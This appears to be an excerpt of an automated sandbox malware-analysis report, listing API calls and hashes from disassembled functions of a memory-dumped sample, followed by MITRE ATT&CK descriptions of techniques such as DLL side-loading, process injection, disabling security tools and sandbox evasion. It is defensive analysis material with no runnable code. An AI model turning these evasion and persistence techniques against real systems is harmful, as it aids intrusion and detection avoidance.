Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
lstrcat.KERNEL32(00000000), ref: 009EC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction ID: f0af5c4dcb8cfb87a3c913a07bb88894657fd74c1c67d5f025faca698121b51c
Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction Fuzzy Hash: C231AFB1D442899BCB21EFA4CC85BAEB7B5EF84304F148466F504A7252DB74ED42DF40

Function 009EC3BF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9

Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
lstrcat.KERNEL32(00000000), ref: 009EC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction ID: 2c0a2bd964beba8487c2cc0ad39e1cc49036cd292dc57436a49d64cb983cc7a2
Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction Fuzzy Hash: 1731AFB1D042899BCB21EFA4CC85BAEB7B9EF84304F148466F404A7251DB74EE42DF50

Function 009EC524 Relevance: 5.1, APIs: 4, Instructions: 85stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9

Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
lstrcat.KERNEL32(00000000), ref: 009EC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 1214f168b6e4d7af61603e865717b0356397f2a796f8462a60e47e72beb01155
Instruction ID: 8f927ea05dd79d6372758e0d617005a810b3031a63ae59897bb2f4c1f2ca3041
Opcode Fuzzy Hash: 1214f168b6e4d7af61603e865717b0356397f2a796f8462a60e47e72beb01155
Instruction Fuzzy Hash: 71316DB1E042899BCB11EFA4CC85BAEB7B5EF85305F148466E504AB251DB74EE02DF50

Function 00421550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00421581
lstrcpy.KERNEL32(00000000,?), ref: 004215B9
lstrcpy.KERNEL32(00000000,?), ref: 004215F1
lstrcpy.KERNEL32(00000000,?), ref: 00421629

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4

Function 00401410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593

lstrcpy.KERNEL32(00000000,?), ref: 00401437
lstrcpy.KERNEL32(00000000,?), ref: 00401459
lstrcpy.KERNEL32(00000000,?), ref: 0040147B
lstrcpy.KERNEL32(00000000,?), ref: 004014DF

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94

Function 009D1677 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000), ref: 009D1794
Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17B6
Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17D8
Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17FA

lstrcpy.KERNEL32(00000000,?), ref: 009D169E
lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
lstrcpy.KERNEL32(00000000,?), ref: 009D1746

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction ID: 2d6e8bdca0f123c52a56453714e2adb7bd189464f87dce6d138644a9273bbf06
Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
Instruction Fuzzy Hash: AA31EA75A41B42AFC724DF3AC988956BBE9FF88305704892EA456D3B50D774F810CF90

Function 009D1673 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000), ref: 009D1794
Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17B6
Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17D8
Part of subcall function 009D1777: lstrcpy.KERNEL32(00000000,?), ref: 009D17FA

lstrcpy.KERNEL32(00000000,?), ref: 009D169E
lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
lstrcpy.KERNEL32(00000000,?), ref: 009D1746

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction ID: 27216c34c6c1d023a415fdc00e94e0a5bcba2ca49ad16c0b1ac62d321e28f733
Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
Instruction Fuzzy Hash: 5E31EA75A41B42AFC724DF3AC984956B7E9FF88305704892EA456D3B60D774F810CF90

Function 009F17B7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 009F17E8
lstrcpy.KERNEL32(00000000,?), ref: 009F1820
lstrcpy.KERNEL32(00000000,?), ref: 009F1858
lstrcpy.KERNEL32(00000000,?), ref: 009F1890

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction ID: 11ebcec5841d6e27d11d3c93eece5a2092d0ac89fcd3a113f1b4d069e2e491f4
Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
Instruction Fuzzy Hash: 4221F974601B068BD734DF2AC998B27B7F9EF44744B14491DE99AC7B40DB74E800CBA0

Function 009EC39D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
lstrcat.KERNEL32(00000000), ref: 009EC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$SystemTimelstrlen
String ID:
API String ID: 3486790982-0
Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction ID: 186733ac8164942475734fc9cdba94be2aaf349664da27eba73dcb157813742a
Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
Instruction Fuzzy Hash: D821ADB0D042899BCB11EFA5CC85BAEB7B9EF85305F188465E400AB251DB78ED02DB90

Function 00406E32 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID:
API String ID: 1643994569-0
Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95

Function 00401510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 0040152D
lstrcpy.KERNEL32(00000000,?), ref: 0040154F
lstrcpy.KERNEL32(00000000,?), ref: 00401571
lstrcpy.KERNEL32(00000000,?), ref: 00401593

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

